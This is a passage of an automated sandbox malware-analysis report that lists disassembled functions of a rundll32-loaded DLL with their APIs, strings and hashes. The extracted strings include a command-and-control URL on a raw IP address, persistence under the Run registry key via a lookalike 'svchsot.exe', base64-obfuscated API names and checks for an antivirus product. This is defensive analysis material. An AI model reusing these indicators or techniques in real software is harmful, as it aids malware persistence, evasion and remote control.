                                                        • VirtualFree.KERNELBASE(00F40000,00000000,00008000,ED815D00), ref: 00F30969
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtualwsprintf$AllocExitFreeMessageProcess
                                                        • String ID: Application error$File corrupt.$SWVU$The ordinal %d could not be located in the DLL %s.$The procedure %s could not be located in the DLL %s.
                                                        • API String ID: 81942880-1423270863
                                                        • Opcode ID: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction ID: 8f6bbf9fa76d40dc9cdc13d791236ba6c4de124a8037939fdff4ea8bfd2c8c8a
                                                        • Opcode Fuzzy Hash: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction Fuzzy Hash: E5418D3264170A9FEB38CF14CC54FEB73A9EF44360F04421AED4697249EF70A8119B90
                                                        Function 10007850 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 427COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 287 10007850-100078be wsprintfA call 10010f36 289 100078c3-100078f0 call 10004940 287->289 292 100078f2-10007904 289->292 293 10007905-10007922 call 10004960 289->293 296 10007924-10007936 293->296 297 10007937-10007966 293->297 300 10007968-1000798a 297->300 301 1000798d 297->301 300->301 302 10007991-100079aa call 10004990 301->302 306 100079b0-100079b3 302->306 307 10007a57-10007abc 302->307 306->307 308 100079b9-10007a52 MultiByteToWideChar call 10010f36 MultiByteToWideChar WideCharToMultiByte call 10010f36 WideCharToMultiByte call 10010f30 * 2 306->308 317 10007ac0-10007acf 307->317 318 10007abe 307->318 308->302 320 10007ad1-10007ad3 317->320 321 10007b43-10007b62 wsprintfA 317->321 318->317 323 10007af1-10007aff 320->323 324 10007ad5-10007ada 320->324 322 10007b64-10007b66 321->322 328 10007b68-10007b6e 322->328 329 10007b8d-10007ba4 call 10010f30 strrchr 322->329 326 10007b11-10007b24 323->326 327 10007b01-10007b06 323->327 330 10007ae7-10007aee call 10010f30 324->330 331 10007adc-10007ade 324->331 334 10007b25-10007b42 call 10010f30 327->334 335 10007b08-10007b0a 327->335 336 10007b70-10007b82 328->336 337 10007b84-10007b8b 328->337 345 10007c22-10007c27 329->345 346 10007ba6-10007bae 329->346 330->323 331->330 338 10007ae0-10007ae5 331->338 335->334 343 10007b0c-10007b0e 335->343 336->322 337->322 338->323 343->326 348 10007c45-10007c53 345->348 349 10007c29-10007c2e 345->349 350 10007bb0-10007bb5 346->350 351 10007bcc-10007bda 346->351 356 10007c82-10007c94 348->356 357 10007c55-10007c5a 348->357 352 10007c30-10007c32 349->352 353 10007c3b-10007c42 call 10010f30 349->353 354 10007bc2-10007bc9 call 10010f30 350->354 355 10007bb7-10007bb9 350->355 358 10007c0c-10007c21 351->358 359 10007bdc-10007be1 351->359 352->353 360 10007c34-10007c39 352->360 353->348 354->351 355->354 361 10007bbb-10007bc0 355->361 364 10007c78-10007c7f call 10010f30 357->364 365 10007c5c-10007c5e 357->365 366 10007c02-10007c09 call 10010f30 359->366 367 10007be3-10007be5 359->367 360->348 361->351 364->356 365->364 370 10007c60-10007c77 365->370 366->358 367->366 371 10007be7-10007c01 367->371
                                                        APIs
                                                        • wsprintfA.USER32 ref: 100078B3
                                                          • Part of subcall function 10004940: InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpenwsprintf
                                                        • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                                        • API String ID: 4197039022-1204782975
                                                        • Opcode ID: 999803450e33462b64aaa07c69cc296db7b29de33b2c74d620c9af4bde4234c4
                                                        • Instruction ID: 82104e091b356ad4de5d2ae183cb47f0814ad9c1a023d1d303f6ff2c213bd519
                                                        • Opcode Fuzzy Hash: 999803450e33462b64aaa07c69cc296db7b29de33b2c74d620c9af4bde4234c4
                                                        • Instruction Fuzzy Hash: F1D14D76E002446FEB14CF68DC81BFEBBA5FB44260F10426EF9199B6C1DA769E01C791
                                                        Function 10006F70 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 151registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F9F
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007059
                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 100070B2
                                                          • Part of subcall function 10004C70: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,76F90F10,?,1000AAC6,?,76F90F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                          • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                                        • String ID: %u MB$09161305$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.204:12354/show.php
                                                        • API String ID: 2543995030-3890994293
                                                        • Opcode ID: 04e96228e0e3d9f47cdf2a2d425d0abb0993c31dc86e1b0c7f7d2b12df92022a
                                                        • Instruction ID: 316c48cea05fc17e5b33d1146d442ec5acb36131d7d9cd43852f4a50c879d7bc
                                                        • Opcode Fuzzy Hash: 04e96228e0e3d9f47cdf2a2d425d0abb0993c31dc86e1b0c7f7d2b12df92022a
                                                        • Instruction Fuzzy Hash: B141F6766002045BE718CA38DC41BAB77D5FBC8350F544A2CFA59CB2C5EE78A9088795
                                                        Function 1000B8E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 65fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile$wsprintf
                                                        • String ID: %s\ASDSvc.exe$%s\V3Lite.exe$C:\1.vbs$InstallPath$U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==
                                                        • API String ID: 1588361905-790033058
                                                        • Opcode ID: 4fdcb9e3cb7b7d7e48ae1263caf4d0724849cc799b86168a61aa29251073b66c
                                                        • Instruction ID: 12df29d0951342ddc407d4625d5417db9b39606e010889d188617410b2ef4019
                                                        • Opcode Fuzzy Hash: 4fdcb9e3cb7b7d7e48ae1263caf4d0724849cc799b86168a61aa29251073b66c
                                                        • Instruction Fuzzy Hash: 1D110AB25043447EE714D264DC82EEBB7A9EBC8350F00892DF78897141EAB8A54887A3
                                                        Function 10008D40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61sleepsynchronizationthreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • WSAStartup.WS2_32(00000202,?), ref: 10008D63
                                                          • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        • GetLastError.KERNEL32 ref: 10008D7C
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008DEE
                                                          • Part of subcall function 10007850: wsprintfA.USER32 ref: 100078B3
                                                        • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 10008DB0
                                                        • CreateThread.KERNEL32 ref: 10008DCC
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008DD7
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008DDE
                                                        • Sleep.KERNEL32(0002BF20), ref: 10008DE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                                        • String ID: 0x5d65r455f$5655029807
                                                        • API String ID: 3565103679-1179119988
                                                        • Opcode ID: 1a60569a9e1742063054e6702fb1a97b3fe3fc6207dee1b9403882afc8ef0e3e
                                                        • Instruction ID: a4b02c7b1a945233db63801da5c4659620b852bd9fb6bbf2a3dc4b8ff304b1f7
                                                        • Opcode Fuzzy Hash: 1a60569a9e1742063054e6702fb1a97b3fe3fc6207dee1b9403882afc8ef0e3e
                                                        • Instruction Fuzzy Hash: 7D1126B6640228B7F360E3609C8AFAA3648EB59395F054235FB09991C6DF709910C7AB
                                                        Function 1000C3E0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 444 1000c3e0-1000c42a Netbios 445 1000c42c-1000c43e 444->445 446 1000c43f-1000c447 444->446 447 1000c449-1000c466 Netbios 446->447 448 1000c48e-1000c4ee Netbios 446->448 447->448 449 1000c468-1000c475 447->449 450 1000c4f0-1000c502 448->450 451 1000c503-1000c572 sprintf 448->451 449->447 452 1000c477-1000c479 449->452 452->448 453 1000c47b-1000c48d 452->453
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Netbios
                                                        • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                                        • API String ID: 544444789-1505804699
                                                        • Opcode ID: e910e69c9fb7de07cf29225844011438d3ce8845e5ccdbd5dc600c0cf43283cc
                                                        • Instruction ID: 9379413c18c3b9cf1080a2849292561f9d104e05a16b954f86d86dab010ff386
                                                        • Opcode Fuzzy Hash: e910e69c9fb7de07cf29225844011438d3ce8845e5ccdbd5dc600c0cf43283cc
                                                        • Instruction Fuzzy Hash: 3641DE361187869BD724CA28C8107FBB7E5EFC4350F48483DA5D48B682DAB8E60DC793
                                                        Function 1000B9B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108registrysleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA17
                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA4D
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1000BAFD
                                                        • Sleep.KERNEL32(000493E0), ref: 1000BB08
                                                        Strings
                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA0D
                                                        • svchsot.exe, xrefs: 1000BAC8
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseInfoOpenQuerySleep
                                                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                                        • API String ID: 2225969182-2172464104
                                                        • Opcode ID: c9bf2ff1d13dae5b833a487b8e81c62bbcc5986c1dc27c5d534927ca15fa1c20
                                                        • Instruction ID: 3ecfd9ec261094238762d341e26dc430852d1dc9185e0953a6393a59da226f92
                                                        • Opcode Fuzzy Hash: c9bf2ff1d13dae5b833a487b8e81c62bbcc5986c1dc27c5d534927ca15fa1c20
                                                        • Instruction Fuzzy Hash: 9D313D71209341AFE311CF55CC84FABB7E9FBC9B44F40492DF28596184DA70EA05CBA2
                                                        Function 10008E10 Relevance: 10.5, APIs: 7, Instructions: 46sleepsynchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 10008E24
                                                          • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        • GetLastError.KERNEL32 ref: 10008E4A
                                                        • CreateThread.KERNEL32(00000000,00000000,10008AC0,?,00000000,00000000), ref: 10008E70
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008E77
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008E7A
                                                        • Sleep.KERNEL32(00002710), ref: 10008E85
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008E8E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                                        • String ID:
                                                        • API String ID: 3243752880-0
                                                        • Opcode ID: 9bbb0afe37d6a0cff180d47d71fffd662c2ae0feb124397235c8bdfd42b3b31a
                                                        • Instruction ID: 2b476891007528d670aaa261bba301581ebdf0ea9bc8df80ae5b71414b63efd8
                                                        • Opcode Fuzzy Hash: 9bbb0afe37d6a0cff180d47d71fffd662c2ae0feb124397235c8bdfd42b3b31a
                                                        • Instruction Fuzzy Hash: D2012875244260BBF2219760DC4EF9F3B68FB8A790F114224FB1C961C2CBB4691083BB
                                                        Function 10009530 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 117sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • http://107.163.241.204:12354/show.php, xrefs: 100095A3
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Sleep$wsprintf
                                                        • String ID: http://107.163.241.204:12354/show.php
                                                        • API String ID: 3195947292-2343821269
                                                        • Opcode ID: aa6c9d3bb28695e2680ac91108b719837dce01328cd36e7a113264c4bb11100c
                                                        • Instruction ID: f0ac92a7d81d97515580aba3bf1198aa49dabea17cc57831871ccb142944b746
                                                        • Opcode Fuzzy Hash: aa6c9d3bb28695e2680ac91108b719837dce01328cd36e7a113264c4bb11100c
                                                        • Instruction Fuzzy Hash: A531AE716046856BF361CA34CC92ADB3BC6EB453D0F11493CF68587189EA37D84C8352
                                                        Function 10011171 Relevance: 3.8, APIs: 3, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: _inittermfreemalloc
                                                        • String ID:
                                                        • API String ID: 1678931842-0
                                                        • Opcode ID: 29de6a0919e72c9ce90837e4cfa0372134af6144f2ffe0f560bbd249553a6893
                                                        • Instruction ID: 89c66d5e5ef6756a3be054b8b1b5234f4a8a23339d9655e7039f3d4392aee007
                                                        • Opcode Fuzzy Hash: 29de6a0919e72c9ce90837e4cfa0372134af6144f2ffe0f560bbd249553a6893
                                                        • Instruction Fuzzy Hash: 2B11A071208226AFF318CBA4DDD5F8A37E5FB08391F11801EE901CB2A0E731E890CB40
                                                        Function 10002580 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(6DFB0000,00000000), ref: 100025A4
                                                        Strings
                                                        • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002590
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                                        • API String ID: 190572456-980335172
                                                        • Opcode ID: 81376ad01542c8d7aa510b5a1fbaf4177278977829d2dc468818db707d46ecd3
                                                        • Instruction ID: ee2c1b9eaecec095c1495435bf22087756d9ff6aa0c22ba2e45eaa1fd3928b02
                                                        • Opcode Fuzzy Hash: 81376ad01542c8d7aa510b5a1fbaf4177278977829d2dc468818db707d46ecd3
                                                        • Instruction Fuzzy Hash: 98C08CF4800A10DBF602CBB49C84B0633A8E30C18BB008020F41DC221AEB30E2848725
                                                        Function 10002640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(6DFB0000,00000000), ref: 10002664
                                                        Strings
                                                        • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002650
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                                        • API String ID: 190572456-3244026974
                                                        • Opcode ID: 2cb19a475e9f940d8fa42b2659e369d611ebc8e3f3c4efcc642f9a4dc9ee3403
                                                        • Instruction ID: b49ee88265c95803bbe09daecf6b9b773d0258d54844777730bf0e747ca74e0c
                                                        • Opcode Fuzzy Hash: 2cb19a475e9f940d8fa42b2659e369d611ebc8e3f3c4efcc642f9a4dc9ee3403
                                                        • Instruction Fuzzy Hash: 94C08CF8800920DBF642CBB09C84B063398E30C28AB008020F599D221ADB31F2808722
                                                        Function 10001000 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 137stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: VUUU
                                                        • API String ID: 3722407311-2040033107
                                                        • Opcode ID: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                        • Instruction ID: c786a2ff591aff92977bd3f5140d7e1907602f98ed4a153bb8b8b05817a39e60
                                                        • Opcode Fuzzy Hash: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                        • Instruction Fuzzy Hash: AF416B31B0049207F32DC62C8CB227ABBD2DB922C0B54813EE6C7C7256D9A2DD66C350
                                                        Function 1000B5E0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 1000B0A0: lstrcpy.KERNEL32(?,?), ref: 1000B0D9
                                                          • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,10019BE4), ref: 1000B0F2
                                                          • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,*.*), ref: 1000B101
                                                          • Part of subcall function 1000B0A0: FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113
                                                        • Sleep.KERNEL32(0036EE80), ref: 1000B686
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                                        • String ID: C:\Program Files
                                                        • API String ID: 187370985-1387799010
                                                        • Opcode ID: 25dcf6cf8a732501d953cf42c955e396105a4153fdc7747b2ad82983722b2fc6
                                                        • Instruction ID: bf3bebc3486c08cb9be8516adc5afa7db24ceed3d0b344f5df12b39d219439a2
                                                        • Opcode Fuzzy Hash: 25dcf6cf8a732501d953cf42c955e396105a4153fdc7747b2ad82983722b2fc6
                                                        • Instruction Fuzzy Hash: 1211A1B88047558BF300DF68ECC15477BE0FB84784F018929E89587326E731D548CBA7
                                                        Function 00F30FA4 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 00F30FD3
                                                        • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 00F30FF1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
                                                        • Instruction ID: 583b3da6742065935a9b65008412b1e27c1195db417a97469b654dae08045582
                                                        • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
                                                        • Instruction Fuzzy Hash: 4CF0E933240245AFEB198F64D895EEE7768DF48398B20016BF6029A186CA71E551C754
                                                        Function 00F30063 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00F3007E
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 00F300BE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: c7f3f847bd39c9ffca4c5c83804de00699601861443dcce05f992f4345ead0f0
                                                        • Instruction ID: eddf8f832131def0e62503fd4554cf1f679cbd1f716fa79c2af3868426b395f5
                                                        • Opcode Fuzzy Hash: c7f3f847bd39c9ffca4c5c83804de00699601861443dcce05f992f4345ead0f0
                                                        • Instruction Fuzzy Hash: B401A4B6209601BEE7318AA19C50F37BBECDF48722F144C5BFAD5C5091DD25E840AB70
                                                        Function 10004C20 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,100090BE,80000001,00000000,?), ref: 10004C4D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: dcb72b9d121e4c2de8108387673df4cf873707b98aa56f1b6d75724d6adb63c3
                                                        • Instruction ID: 61b6c47c184ca06b9fd72a7f0ba2ec17e889df0e2832bec4f887a7ac6ceaf705
                                                        • Opcode Fuzzy Hash: dcb72b9d121e4c2de8108387673df4cf873707b98aa56f1b6d75724d6adb63c3
                                                        • Instruction Fuzzy Hash: 38E00AB5218601AF9604CF49D894D1BB3F9AFCC700F10CA0CF599C3254D630E806CB62
                                                        Function 10004B40 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000003,00000003,00000003,00000003,00000003,40000000,?,1000BBE4,c:\ftelcs\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004B63
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: e3e2f9212aea94acbb92fcce48639bc2d0a459d7904b4c206f7290380be75b4f
                                                        • Instruction ID: 5c848e7f91643569c05fc166510404e816cd169a4a996ef37c8896439641648e
                                                        • Opcode Fuzzy Hash: e3e2f9212aea94acbb92fcce48639bc2d0a459d7904b4c206f7290380be75b4f
                                                        • Instruction Fuzzy Hash: 9FD0A2B5618202AF9A44CF98EA94D1BB7E9ABCDB10F10890CB585D3254D670EC49CB73
                                                        Function 10004C70 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                        Download Yara Rule
                                                        APIs
